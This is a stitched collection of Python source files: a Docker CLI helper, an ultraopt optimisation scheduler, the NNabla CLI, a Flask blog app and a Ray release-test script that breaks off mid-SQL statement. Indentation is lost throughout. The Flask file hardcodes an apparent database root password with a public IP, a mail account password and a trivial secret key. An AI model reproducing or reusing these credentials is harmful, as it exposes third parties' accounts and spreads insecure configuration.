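# is the decoded stdout with a trailing newline stripped):
#   names = run(["docker", "ps", "--format", "{{.Names}}"])
#   out, err = run(["docker", "version"], return_stderr=True)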
ValidPath = Union[str, Path]
def to_list(x) -> list:
if isinstance(x, list):
return x
else:
return [x]
# backport of https://docs.python.org/3.9/library/stdtypes.html#str.removesuffix
def removesuffix(string: str, suffix: str) -> str:
if string.endswith(suffix):
return string[: -len(suffix)]
else:
return string
def removeprefix(string: str, prefix: str) -> str:
if string.startswith(prefix):
return string[len(prefix) :]
else:
return string
def reader(pipe, pipe_name, queue):
try:
with pipe:
for line in iter(pipe.readline, b""):
queue.put((pipe_name, line))
finally:
queue.put(None)
def stream_stdout_and_stderr(full_cmd: list) -> Iterable[Tuple[str, bytes]]:
full_cmd = list(map(str, full_cmd))
process = Popen(full_cmd, stdout=PIPE, stderr=PIPE)
q = Queue()
full_stderr = b"" # for the error message
Thread(target=reader, args=[process.stdout, "stdout", q]).start()
Thread(target=reader, args=[process.stderr, "stderr", q]).start()
for _ in range(2):
for source, line in iter(q.get, None):
yield source, line
if source == "stderr":
full_stderr += line
exit_code = process.wait()
if exit_code != 0:
raise DockerException(full_cmd, exit_code, stderr=full_stderr)
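# Streaming sketch (assumes the docker CLI is installed): each yielded item is
# tagged with the pipe it came from, so stderr can be surfaced separately.
#   for source, line in stream_stdout_and_stderr(["docker", "pull", "alpine"]):
#       print(source, line.decode(errors="replace"), end="")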
def format_dict_for_cli(dictionary: Dict[str, str], separator="="):
return [f"{key}{separator}{value}" for key, value in dictionary.items()]
def read_env_file(env_file: Path) -> Dict[str, str]:
result_dict = {}
for line in env_file.read_text().splitlines():
line = line.strip()
try:
first_sharp = line.index("#")
except ValueError:
pass
else:
line = line[:first_sharp]
if not line:
continue
line = line.strip()
key, value = line.split("=", 1)
result_dict[key] = value
return result_dict
def read_env_files(env_files: List[Path]) -> Dict[str, str]:
result_dict = {}
for file in env_files:
result_dict.update(read_env_file(file))
return result_dict
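# Example (hypothetical .env contents): a file containing
#   FOO=1   # trailing comments are stripped
#   # full-line comments and blank lines are skipped
# parses to {"FOO": "1"}; read_env_files() merges several such files, with
# later files overriding earlier ones.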
|
master.py
|
import copy
import os
import threading
import time
from collections import defaultdict
from typing import Dict
import numpy as np
from ultraopt.facade.utils import get_wanted
from ultraopt.multi_fidelity.iter import WarmStartIteration
from ultraopt.multi_fidelity.iter_gen.base_gen import BaseIterGenerator
from ultraopt.optimizer.base_opt import BaseOptimizer
from ultraopt.utils.logging_ import get_logger
from ultraopt.utils.progress import no_progress_callback
from .dispatcher import Dispatcher
from ..result import Result
from ..utils.misc import print_incumbent_trajectory, dump_checkpoint
class Master(object):
def __init__(self,
run_id,
optimizer: BaseOptimizer,
iter_generator: BaseIterGenerator,
progress_callback=no_progress_callback,
checkpoint_file=None,
checkpoint_freq=10,
working_directory='.',
ping_interval=60,
time_left_for_this_task=np.inf,
nameserver='127.0.0.1',
nameserver_port=None,
host=None,
shutdown_workers=True,
job_queue_sizes=(-1, 0),
dynamic_queue_size=True,
result_logger=None,
previous_result=None,
incumbents: Dict[float, dict] = None,
incumbent_performances: Dict[float, float] = None
):
"""The Master class is responsible for the book keeping and to decide what to run next. Optimizers are
instantiations of Master, that handle the important steps of deciding what configurations to run on what
budget when.
Parameters
----------
run_id : string
A unique identifier of that Hyperband run. Use, for example, the cluster's JobID when running multiple
concurrent runs to separate them
optimizer: ultraopt.optimizer.base_opt.BaseOptimizer object
An object that can generate new configurations and registers results of executed runs
working_directory: string
The top level working directory accessible to all compute nodes (shared filesystem).
eta : float
In each iteration, a complete run of sequential halving is executed. In it,
after evaluating each configuration on the same subset size, only a fraction of
1/eta of them 'advances' to the next round.
Must be greater or equal to 2.
min_budget : float
The smallest budget to consider. Needs to be positive!
max_budget : float
the largest budget to consider. Needs to be larger than min_budget!
The budgets will be geometrically distributed :math:`\sim \eta^k` for
:math:`k\in [0, 1, ... , num\_subsets - 1]`.
ping_interval: int
number of seconds between pings to discover new nodes. Default is 60 seconds.
nameserver: str
address of the Pyro4 nameserver
nameserver_port: int
port of Pyro4 nameserver
host: str
ip (or name that resolves to that) of the network interface to use
shutdown_workers: bool
flag to control whether the workers are shutdown after the computation is done
job_queue_sizes: tuple of ints
min and max size of the job queue. During the run, when the number of jobs in the queue
reaches the min value, it will be filled up to the max size. Default: (-1, 0)
dynamic_queue_size: bool
Whether or not to change the queue size based on the number of workers available.
If true (default), the job_queue_sizes are relative to the current number of workers.
logger: logging.logger like object
the logger to output some (more or less meaningful) information
result_logger:
a result logger that writes live results to disk
previous_result:
previous run to warmstart the run
"""
self.checkpoint_freq = checkpoint_freq
self.checkpoint_file = checkpoint_file
self.progress_callback = progress_callback
iter_generator.initialize(optimizer)
self.iter_generator = iter_generator
self.time_left_for_this_task = time_left_for_this_task
self.working_directory = working_directory
os.makedirs(self.working_directory, exist_ok=True)
self.logger = get_logger(self)
self.result_logger = result_logger
self.optimizer = optimizer
self.time_ref = None
self.iterations = []
self.jobs = []
self.num_running_jobs = 0
self.job_queue_sizes = job_queue_sizes
self.user_job_queue_sizes = job_queue_sizes
self.dynamic_queue_size = dynamic_queue_size
if job_queue_sizes[0] >= job_queue_sizes[1]:
raise ValueError("The queue size range needs to be (min, max) with min<max!")
if previous_result is None:
self.warmstart_iteration = []
else:
self.warmstart_iteration = [WarmStartIteration(previous_result, self.optimizer)]
# condition to synchronize the job_callback and the queue
self.thread_cond = threading.Condition()
self.config = {
'time_ref': self.time_ref
}
self.dispatcher = Dispatcher(
self.job_callback, queue_callback=self.adjust_queue_size,
run_id=run_id, ping_interval=ping_interval,
nameserver=nameserver, nameserver_port=nameserver_port,
host=host
)
self.incumbents = defaultdict(dict)
self.incumbent_performances = defaultdict(lambda: np.inf)
if incumbents is not None:
self.incumbents.update(incumbents)
if incumbent_performances is not None:
self.incumbent_performances.update(incumbent_performances)
self.dispatcher_thread = threading.Thread(target=self.dispatcher.run)
self.dispatcher_thread.start()
def shutdown(self, shutdown_workers=False):
self.logger.info('HBMASTER: shutdown initiated, shutdown_workers = %s' % (str(shutdown_workers)))
self.dispatcher.shutdown(shutdown_workers)
self.dispatcher_thread.join()
def wait_for_workers(self, min_n_workers=1):
"""
helper function to hold execution until some workers are active
Parameters
----------
min_n_workers: int
minimum number of workers present before the run starts
"""
self.logger.debug('wait_for_workers trying to get the condition')
with self.thread_cond:
while (self.dispatcher.number_of_workers() < min_n_workers):
self.logger.debug('HBMASTER: only %i worker(s) available, waiting for at least %i.' % (
self.dispatcher.number_of_workers(), min_n_workers))
self.thread_cond.wait(1)
self.dispatcher.trigger_discover_worker()
self.logger.debug('Enough workers to start this run!')
def get_next_iteration(self, iteration, iteration_kwargs):
"""
instantiates the next iteration
Overwrite this to change the multi_fidelity for different optimizers
Parameters
----------
iteration: int
the index of the iteration to be instantiated
iteration_kwargs: dict
additional kwargs for the iteration class
Returns
-------
HB_iteration: a valid HB iteration object
"""
return self.iter_generator.get_next_iteration(iteration, **iteration_kwargs)
def run(self, n_iterations=1, min_n_workers=1, iteration_kwargs={}, ):
"""
run n_iterations of RankReductionIteration
Parameters
----------
n_iterations: int
number of multi_fidelity to be performed in this run
min_n_workers: int
minimum number of workers before starting the run
"""
self.all_n_iterations = self.iter_generator.num_all_configs(n_iterations)
self.progress_bar = self.progress_callback(0, self.all_n_iterations)
self.iter_cnt = 0
self.wait_for_workers(min_n_workers)
iteration_kwargs.update({'result_logger': self.result_logger})
if self.time_ref is None:
self.time_ref = time.time()
self.config['time_ref'] = self.time_ref
self.logger.debug('HBMASTER: starting run at %s' % (str(self.time_ref)))
self.thread_cond.acquire()
start_time = time.time()
with self.progress_bar as self.progress_ctx:
while True:
self._queue_wait()
cost_time = time.time() - start_time
if cost_time > self.time_left_for_this_task:
self.logger.warning(f"cost_time = {cost_time:.2f}, "
f"exceed time_left_for_this_task = {self.time_left_for_this_task}")
break
next_run = None
# find a new run to schedule
for i in self.active_iterations(): # filter self.iterations down to the active ones
next_run = self.iterations[i].get_next_run()
if next_run is not None: break # successfully fetched a configuration; stop looking
if next_run is not None:
self.logger.debug('HBMASTER: schedule new run for iteration %i' % i)
self._submit_job(*next_run)
continue
else:
if n_iterations > 0: # we might be able to start the next iteration
# the multi_fidelity objects here are actually of type List[RankReductionIteration]
self.iterations.append(self.get_next_iteration(len(self.iterations), iteration_kwargs))
n_iterations -= 1
continue
cost_time = time.time() - start_time
if cost_time > self.time_left_for_this_task:
self.logger.warning(f"cost_time = {cost_time:.2f}, "
f"exceed time_left_for_this_task = {self.time_left_for_this_task}")
break
# at this point there is no immediate run that can be scheduled,
# so wait for some job to finish if there are active multi_fidelity
if self.active_iterations():
self.thread_cond.wait()
else:
break
self.thread_cond.release()
for i in self.warmstart_iteration:
i.fix_timestamps(self.time_ref)
ws_data = [i.data for i in self.warmstart_iteration]
return Result([copy.deepcopy(i.data) for i in self.iterations] + ws_data, self.config)
def adjust_queue_size(self, number_of_workers=None):
self.logger.debug('HBMASTER: number of workers changed to %s' % str(number_of_workers))
with self.thread_cond:
self.logger.debug('adjust_queue_size: lock acquired')
if self.dynamic_queue_size:
nw = self.dispatcher.number_of_workers() if number_of_workers is None else number_of_workers
self.job_queue_sizes = (self.user_job_queue_sizes[0] + nw, self.user_job_queue_sizes[1] + nw)
self.logger.debug('HBMASTER: adjusted queue size to %s' % str(self.job_queue_sizes))
self.thread_cond.notify_all()
def job_callback(self, job):
"""
method to be called when a job has finished
this will do some book keeping and call the user defined
new_result_callback if one was specified
"""
self.logger.debug('job_callback for %s started' % str(job.id))
with self.thread_cond:
self.logger.debug('job_callback for %s got condition' % str(job.id))
self.num_running_jobs -= 1
if job.result is not None:
budget = job.kwargs["budget"]
challenger = job.kwargs["config"]
challenger_performance = job.result["loss"]
incumbent_performance = self.incumbent_performances[budget]
incumbent = self.incumbents[budget]
if challenger_performance < incumbent_performance:
if np.isfinite(self.incumbent_performances[budget]):
print_incumbent_trajectory(
challenger_performance, incumbent_performance,
challenger, incumbent, budget
)
self.incumbent_performances[budget] = challenger_performance
self.incumbents[budget] = challenger
if self.result_logger is not None:
self.result_logger(job)
self.iterations[job.id[0]].register_result(job)
self.optimizer.new_result(job)
# update the progress bar and related bookkeeping
max_budget, best_loss, _ = get_wanted(self.optimizer)
self.progress_ctx.postfix = f"max budget: {max_budget}, best loss: {best_loss:.3f}"
self.progress_ctx.update(1)
self.iter_cnt += 1
if self.checkpoint_file is not None:
if (self.iter_cnt - 1) % self.checkpoint_freq == 0 or self.iter_cnt == self.all_n_iterations:
dump_checkpoint(self.optimizer, self.checkpoint_file)
if self.num_running_jobs <= self.job_queue_sizes[0]:
self.logger.debug("HBMASTER: Trying to run another job!")
self.thread_cond.notify()
self.logger.debug('job_callback for %s finished' % str(job.id))
def _queue_wait(self):
"""
helper function that blocks until the number of running jobs has dropped back to the lower queue bound
"""
if self.num_running_jobs >= self.job_queue_sizes[1]:
while (self.num_running_jobs > self.job_queue_sizes[0]):
self.logger.debug('HBMASTER: running jobs: %i, queue sizes: %s -> wait' % (
self.num_running_jobs, str(self.job_queue_sizes)))
self.thread_cond.wait()
def _submit_job(self, config_id, config, config_info, budget):
"""
hidden function to submit a new job to the dispatcher
This function handles the actual submission in a
(hopefully) thread-safe way
"""
self.logger.debug('HBMASTER: trying to submit job %s to dispatcher' % str(config_id))
with self.thread_cond:
self.logger.debug('HBMASTER: submitting job %s to dispatcher' % str(config_id))
self.dispatcher.submit_job(config_id, config=config, config_info=config_info, budget=budget,
working_directory=self.working_directory)
self.num_running_jobs += 1
# shouldn't the next line be executed while holding the condition?
self.logger.debug("HBMASTER: job %s submitted to dispatcher" % str(config_id))
def active_iterations(self):
"""
function to find active (not marked as finished) multi_fidelity
Returns
-------
list: all active iteration objects (empty if there are none)
"""
return [i for i in range(len(self.iterations)) if not self.iterations[i].is_finished]
def __del__(self):
# todo: kill server
pass
|
cli.py
|
# Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import sys
import warnings
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
from nnabla.logger import logger
def _nnabla_version():
import nnabla
import nnabla.utils.callback as callback
version_string = 'Version:{}, Build:{}'.format(nnabla.__version__,
nnabla.__build_number__)
callback_version_string = callback.get_callback_version()
if callback_version_string is not None:
version_string += ', Callback:{}'.format(callback_version_string)
return version_string
def version_command(args):
print(_nnabla_version())
return_value = None
def main():
global return_value
import six.moves._thread as thread
import threading
thread.stack_size(128 * 1024 * 1024)
sys.setrecursionlimit(0x3fffffff)
main_thread = threading.Thread(target=cli_main)
main_thread.start()
main_thread.join()
if not return_value:
sys.exit(-1)
def cli_main():
global return_value
return_value = False
parser = argparse.ArgumentParser(description='Command line interface ' +
'for NNabla({})'.format(_nnabla_version()))
parser.add_argument(
'-m', '--mpi', help='exec with mpi.', action='store_true')
subparsers = parser.add_subparsers()
from nnabla.utils.cli.train import add_train_command
add_train_command(subparsers)
from nnabla.utils.cli.forward import add_infer_command, add_forward_command
add_infer_command(subparsers)
add_forward_command(subparsers)
from nnabla.utils.cli.encode_decode_param import add_decode_param_command, add_encode_param_command
add_encode_param_command(subparsers)
add_decode_param_command(subparsers)
from nnabla.utils.cli.profile import add_profile_command
add_profile_command(subparsers)
from nnabla.utils.cli.conv_dataset import add_conv_dataset_command
add_conv_dataset_command(subparsers)
from nnabla.utils.cli.compare_with_cpu import add_compare_with_cpu_command
add_compare_with_cpu_command(subparsers)
from nnabla.utils.cli.create_image_classification_dataset import add_create_image_classification_dataset_command
add_create_image_classification_dataset_command(subparsers)
from nnabla.utils.cli.create_object_detection_dataset import add_create_object_detection_dataset_command
add_create_object_detection_dataset_command(subparsers)
from nnabla.utils.cli.uploader import add_upload_command
add_upload_command(subparsers)
from nnabla.utils.cli.uploader import add_create_tar_command
add_create_tar_command(subparsers)
from nnabla.utils.cli.convert import add_convert_command
add_convert_command(subparsers)
from nnabla.utils.cli.func_info import add_function_info_command
add_function_info_command(subparsers)
from nnabla.utils.cli.plot import (
add_plot_series_command, add_plot_timer_command)
add_plot_series_command(subparsers)
add_plot_timer_command(subparsers)
from nnabla.utils.cli.draw_graph import add_draw_graph_command
add_draw_graph_command(subparsers)
# Version
subparser = subparsers.add_parser(
'version', help='Print version and build number.')
subparser.set_defaults(func=version_command)
print('NNabla command line interface ({})'.format(_nnabla_version()))
args = parser.parse_args()
if 'func' not in args:
parser.print_help(sys.stderr)
sys.exit(-1)
if args.mpi:
from nnabla.utils.communicator_util import create_communicator
comm = create_communicator()
try:
return_value = args.func(args)
except:
import traceback
print(traceback.format_exc())
logger.log(99, "ABORTED")
os.kill(os.getpid(), 9)
# comm.abort()
else:
try:
return_value = args.func(args)
except:
import traceback
print(traceback.format_exc())
return_value = False
sys.exit(-1)
if __name__ == '__main__':
main()
|
Pan_blog.py
|
from flask import Flask,request,render_template,session,redirect,url_for,flash
from flask_bootstrap import Bootstrap
from flask_moment import Moment
from flask_wtf import FlaskForm
from flask_script import Shell,Manager
from datetime import datetime
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail,Message
import os
from threading import Thread
basedir = os.path.abspath(os.path.dirname(__file__))
app = Flask(__name__)
app.config["SQLALCHEMY_DATABASE_URI"] = "mysql+pymysql://root:guo3625202123@132.232.77.200:3306/Pan-blog?charset=utf8mb4"
app.config["SQLALCHEMY_COMMIT_ON_TEARDOWN"] = True
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = True
app.config['FLASKY_MAIL_PREFIX'] = '[平底锅]'
app.config['FLASKY_MAIL_SENDER'] = '平底锅 Admin'
app.config.update(
DEBUG = True,
MAIL_SERVER='smtp.126.com',
MAIL_PORT=25,
MAIL_USE_TLS = False,
MAIL_USE_SSL = False,
MAIL_USERNAME = 'follow_wind@126.com',
MAIL_PASSWORD = 'XG2tX5dEtxER',
# MAIL_PASSWORD = 'poippvcqweanbbcc' 763532119@qq.com
MAIL_DEBUG = True
)
app.config['FLASKY_ADMIN'] = os.environ.get('FLASKY_ADMIN')
app.config["SECRET_KEY"] = "12345678"
bootstrap = Bootstrap(app)
moment = Moment(app)
db = SQLAlchemy(app)
manager = Manager(app)
mail = Mail(app)
def make_shell_context():
return dict(app=app, db=db, User=User, Role=Role)
manager.add_command('shell',Shell(make_shell_context))
def send_async_email(app,msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
msg = Message(app.config['FLASKY_MAIL_PREFIX'] + subject,
sender='follow_wind@126.com', recipients=[to])
# sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email,args=[app,msg])
thr.start()
print('send_mail')
return thr
@app.route('/',methods=['GET','POST'])
def index():
form = NameForm()
if form.validate_on_submit():
user=User.query.filter_by(username=form.name.data).first()
if user is None:
user=User(username=form.name.data)
db.session.add(user)
session['known']=False
send_email('follow_wind@126.com','New User','mail/new_user',user=user)
# if app.config['FLASKY_ADMIN']:
# send_email(app.config['FLASKY_ADMIN'], 'New User',
# 'mail/new_user', user=user)
else:
session['known']=True
# old_name = session.get('name')
# if old_name is not None and old_name != form.name.data:
# flash('Looks like you have changed your name!')
session['name'] = form.name.data
form.name.data=''
return redirect(url_for('index'))
return render_template('index.html', form=form,name=session.get('name'),known=session.get('known',False),current_time=datetime.utcnow())
@app.route('/user/<name>')
def user( name):
return render_template('user.html', name= name)
class NameForm(FlaskForm):
name = StringField('What is your name?', validators=[DataRequired()])
submit = SubmitField('Submit')
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64),unique=True)
users = db.relationship('User', backref='role',lazy='dynamic')
def __repr__(self):
return '<Role %r>'% self.name
class User(db.Model):
__tablename__='users'
id = db.Column(db.Integer,primary_key=True)
username = db.Column(db.String(64),unique=True,index=True)
role_id = db.Column(db.Integer,db.ForeignKey('roles.id'))
def __repr__(self):
return '<User %r>' %self.username
if __name__ == '__main__':
manager.run()
|
e2e.py
|
"""
This is an end to end release test automation script used to kick off periodic
release tests, running on Anyscale.
The tool leverages app configs and compute templates.
Calling this script will run a single release test.
Example:
python e2e.py --test-config ~/ray/release/xgboost_tests/xgboost_tests.yaml --test-name tune_small
The following steps are then performed:
1. It will look up the test tune_small in the file xgboost_tests.yaml
2. It will fetch the specified app config and compute template and register
those with anyscale (if they don’t exist yet)
3. It waits until the app config is built
4. It then kicks off the script defined in the run block
5. When the script is finished, it will fetch the latest logs, the full log
output, and any artifacts specified in the artifacts block.
6. The full logs and artifacts will be stored in an S3 bucket
7. It will also fetch the json file specified in the run block as results.
This is the file where you should write your metrics to.
8. All results are then stored in a database.
Specifically it will store the following fields:
- Timestamp
- Test name
- Status (finished, error, timeout, invalid)
- Last logs (50 lines)
- results (see above)
- artifacts (links to s3 files)
Then the script exits. If an error occurs at any time, a fail result is
written to the database.
Writing a new release test
--------------------------
Each release test requires the following:
1. It has to be added in a release test yaml file, describing meta information
about the test (e.g. name, command to run, timeout)
2. You need an app config yaml
3. You need a compute template yaml
4. You need to define a command to run. This is usually a python script.
The command should accept (or ignore) a single optional
`--smoke-test` argument.
Usually the command should write its result metrics to a json file.
The json filename is available in the TEST_OUTPUT_JSON env variable.
The script will have access to these environment variables:
"RAY_ADDRESS": os.environ.get("RAY_ADDRESS", "auto")
"TEST_OUTPUT_JSON": results_json_filename
"IS_SMOKE_TEST": "1" if smoke_test else "0"
For an example, take a look at the XGBoost test suite:
https://github.com/ray-project/ray/blob/master/release/xgboost_tests/xgboost_tests.yaml
These all use the same app configs and similar compute templates. This means
that app configs can be re-used across runs and only have to be built once.
App configs and compute templates can interpret environment variables.
A notable one is the `RAY_WHEELS` variable which points to the wheels that
should be tested (e.g. latest master wheels). You might want to include
something like this in your `post_build_cmds`:
- pip3 install -U {{ env["RAY_WHEELS"] | default("ray") }}
If you want to force rebuilds, consider using something like
- echo {{ env["TIMESTAMP"] }}
so that your app configs changes each time the script is executed. If you
only want to trigger rebuilds once per day, use `DATESTAMP` instead:
- echo {{ env["DATESTAMP"] }}
Local testing
-------------
For local testing, make sure to authenticate with the ray-ossci AWS user
(e.g. by setting the respective environment variables obtained from go/aws),
or use the `--no-report` command line argument.
Also make sure to set these environment variables:
- ANYSCALE_CLI_TOKEN (should contain your anyscale credential token)
- ANYSCALE_PROJECT (should point to a project ID you have access to)
A test can then be run like this:
python e2e.py --no-report --test-config ~/ray/release/xgboost_tests/xgboost_tests.yaml --test-name tune_small
The `--no-report` option disables storing the results in the DB and
artifacts on S3. If you set this option, you do not need access to the
ray-ossci AWS user.
Running on Head Node vs Running with Anyscale Connect
-----------------------------------------------------
By default release tests run their drivers on the head node. Support is being
added to run release tests that execute the driver as a subprocess and run
the workload on Anyscale product via Anyscale connect.
Note that when the driver in the test is a subprocess of releaser, releaser
cannot be terminated before the test finishes.
Other known feature gaps when running with Anyscale connect:
- Kicking off a test or checking progress is not supported.
- Downloading / uploading logs and artifacts are unsupported.
- Logs from remote may not have finished streaming, before the driver exits.
Long running tests
------------------
Long running tests can be kicked off by adding the --kick-off-only
parameters to the e2e script. The status can then be checked with the
--check command.
Long running test sessions will be terminated after `timeout` seconds, after
which the latest result in the TEST_OUTPUT_JSON will be reported. Thus,
long running release tests should update this file periodically.
There are also two config options to configure behavior. The `time_key` is
needed to track the latest update of the TEST_OUTPUT_JSON and should contain
a floating point number (usually `time.time()`). The `max_update_delay` then
specifies the maximum time in seconds that may pass without an update
to the results json. If the output file hasn't been updated in e.g. 60 seconds,
this could indicate that the command is stale/frozen, and thus should fail.
Release test yaml example
-------------------------
- name: example
owner:
mail: "kai@anyscale.com" # Currently not used
slack: "@tune-team" # Currentl not used
cluster:
app_config: app_config.yaml # Relative to the release test yaml
compute_template: tpl_cpu.yaml
run:
timeout: 600 # in seconds
prepare: python wait_cluster.py 4 600 # prepare cmd to run before test
script: python workloads/train.py # actual release test command
# Only needed for long running test
time_key: last_update # Key in the results json indicating current time
max_update_delay: 30 # If state hasn't been updated in 30s, terminate
# This block is optional
artifacts:
# Artifact name: location on head node
- detailed_output: detailed_output.csv
# This block is optional. If present, the contents will be
# deep updated for smoke testing
smoke_test:
cluster:
compute_template: tpl_cpu_smoketest.yaml
""" # noqa: E501
import argparse
import boto3
import collections
import copy
import datetime
import hashlib
import jinja2
import json
import logging
import multiprocessing
import os
import requests
import shutil
import subprocess
import sys
import tempfile
import time
from queue import Empty
from typing import Any, Dict, Optional, Tuple, List
import yaml
import anyscale
import anyscale.conf
from anyscale.api import instantiate_api_client
from anyscale.controllers.session_controller import SessionController
from anyscale.sdk.anyscale_client.sdk import AnyscaleSDK
logger = logging.getLogger()
logger.setLevel(logging.INFO)
handler = logging.StreamHandler(stream=sys.stdout)
formatter = logging.Formatter(fmt="[%(levelname)s %(asctime)s] "
"%(filename)s: %(lineno)d "
"%(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
GLOBAL_CONFIG = {
"ANYSCALE_USER": os.environ.get("ANYSCALE_USER",
"release-automation@anyscale.com"),
"ANYSCALE_HOST": os.environ.get("ANYSCALE_HOST",
"https://beta.anyscale.com"),
"ANYSCALE_CLI_TOKEN": os.environ.get("ANYSCALE_CLI_TOKEN"),
"ANYSCALE_CLOUD_ID": os.environ.get(
"ANYSCALE_CLOUD_ID",
"cld_4F7k8814aZzGG8TNUGPKnc"), # cld_4F7k8814aZzGG8TNUGPKnc
"ANYSCALE_PROJECT": os.environ.get("ANYSCALE_PROJECT", ""),
"RAY_VERSION": os.environ.get("RAY_VERSION", "2.0.0.dev0"),
"RAY_REPO": os.environ.get("RAY_REPO",
"https://github.com/ray-project/ray.git"),
"RAY_BRANCH": os.environ.get("RAY_BRANCH", "master"),
"RELEASE_AWS_BUCKET": os.environ.get("RELEASE_AWS_BUCKET",
"ray-release-automation-results"),
"RELEASE_AWS_LOCATION": os.environ.get("RELEASE_AWS_LOCATION", "dev"),
"RELEASE_AWS_DB_NAME": os.environ.get("RELEASE_AWS_DB_NAME", "ray_ci"),
"RELEASE_AWS_DB_TABLE": os.environ.get("RELEASE_AWS_DB_TABLE",
"release_test_result"),
"RELEASE_AWS_DB_SECRET_ARN": os.environ.get(
"RELEASE_AWS_DB_SECRET_ARN",
"arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"rds-db-credentials/cluster-7RB7EYTTBK2EUC3MMTONYRBJLE/ray_ci-MQN2hh",
),
"RELEASE_AWS_DB_RESOURCE_ARN": os.environ.get(
"RELEASE_AWS_DB_RESOURCE_ARN",
"arn:aws:rds:us-west-2:029272617770:cluster:ci-reporting",
),
"DATESTAMP": str(datetime.datetime.now().strftime("%Y%m%d")),
"TIMESTAMP": str(int(datetime.datetime.now().timestamp())),
"EXPIRATION_1D": str((datetime.datetime.now() +
datetime.timedelta(days=1)).strftime("%Y-%m-%d")),
"EXPIRATION_2D": str((datetime.datetime.now() +
datetime.timedelta(days=2)).strftime("%Y-%m-%d")),
"EXPIRATION_3D": str((datetime.datetime.now() +
datetime.timedelta(days=3)).strftime("%Y-%m-%d")),
}
REPORT_S = 30
def maybe_fetch_api_token():
if GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] is None:
print("Missing ANYSCALE_CLI_TOKEN, retrieving from AWS secrets store")
# NOTE(simon) This should automatically retrieve
# release-automation@anyscale.com's anyscale token
GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] = boto3.client(
"secretsmanager", region_name="us-west-2"
).get_secret_value(
SecretId="arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"release-automation/"
"anyscale-token20210505220406333800000001-BcUuKB")["SecretString"]
class ReleaseTestTimeoutError(RuntimeError):
pass
class State:
def __init__(self, state: str, timestamp: float, data: Any):
self.state = state
self.timestamp = timestamp
self.data = data
sys.path.insert(0, anyscale.ANYSCALE_RAY_DIR)
def anyscale_project_url(project_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/projects/{project_id}" \
f"/?tab=session-list"
def anyscale_session_url(project_id: str, session_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/projects/{project_id}" \
f"/clusters/{session_id}"
def anyscale_compute_tpl_url(compute_tpl_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/configurations/cluster-computes" \
f"/{compute_tpl_id}"
def anyscale_app_config_build_url(build_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/configurations/app-config-details" \
f"/{build_id}"
def wheel_url(ray_version, git_branch, git_commit):
return f"https://s3-us-west-2.amazonaws.com/ray-wheels/" \
f"{git_branch}/{git_commit}/" \
f"ray-{ray_version}-cp37-cp37m-manylinux2014_x86_64.whl"
def wheel_exists(ray_version, git_branch, git_commit):
url = wheel_url(ray_version, git_branch, git_commit)
return requests.head(url).status_code == 200
def get_latest_commits(repo: str, branch: str = "master") -> List[str]:
cur = os.getcwd()
with tempfile.TemporaryDirectory() as tmpdir:
os.chdir(tmpdir)
clone_cmd = [
"git",
"clone",
"--filter=tree:0",
"--no-checkout",
# "--single-branch",
# "--depth=10",
f"--branch={branch}",
repo,
tmpdir,
]
log_cmd = [
"git",
"log",
"-n",
"10",
"--pretty=format:%H",
]
subprocess.check_output(clone_cmd)
commits = subprocess.check_output(log_cmd).decode(
sys.stdout.encoding).split("\n")
os.chdir(cur)
return commits
def find_ray_wheels(repo: str, branch: str, version: str):
url = None
commits = get_latest_commits(repo, branch)
logger.info(f"Latest 10 commits for branch {branch}: {commits}")
for commit in commits:
if wheel_exists(version, branch, commit):
url = wheel_url(version, branch, commit)
os.environ["RAY_WHEELS"] = url
logger.info(
f"Found wheels URL for Ray {version}, branch {branch}: "
f"{url}")
break
return url
def _check_stop(stop_event: multiprocessing.Event):
if stop_event.is_set():
raise ReleaseTestTimeoutError("Process timed out.")
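# Recursively merge dict `u` into dict `d`: nested mappings are merged key by
# key instead of being replaced wholesale. This is the helper that applies
# `smoke_test` overrides on top of the base test config.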
def _deep_update(d, u):
for k, v in u.items():
if isinstance(v, collections.abc.Mapping):
d[k] = _deep_update(d.get(k, {}), v)
else:
d[k] = v
return d
def _dict_hash(dt: Dict[Any, Any]) -> str:
json_str = json.dumps(dt, sort_keys=True, ensure_ascii=True)
sha = hashlib.sha256()
sha.update(json_str.encode())
return sha.hexdigest()
def _load_config(local_dir: str, config_file: Optional[str]) -> Optional[Dict]:
if not config_file:
return None
config_path = os.path.join(local_dir, config_file)
with open(config_path, "rt") as f:
# Todo: jinja2 render
content = f.read()
env = copy.deepcopy(os.environ)
env.update(GLOBAL_CONFIG)
content = jinja2.Template(content).render(env=env)
return yaml.safe_load(content)
def has_errored(result: Dict[Any, Any]) -> bool:
return result.get("status", "invalid") != "finished"
def report_result(test_suite: str, test_name: str, status: str, logs: str,
results: Dict[Any, Any], artifacts: Dict[Any, Any],
category: str):
now = datetime.datetime.utcnow()
rds_data_client = boto3.client("rds-data", region_name="us-west-2")
schema = GLOBAL_CONFIG["RELEASE_AWS_DB_TABLE"]
sql = (
f"INSERT INTO {schema} "
f"(created_on, test_suite, test_name, status, last_logs, "
f"results, artifacts, category) "
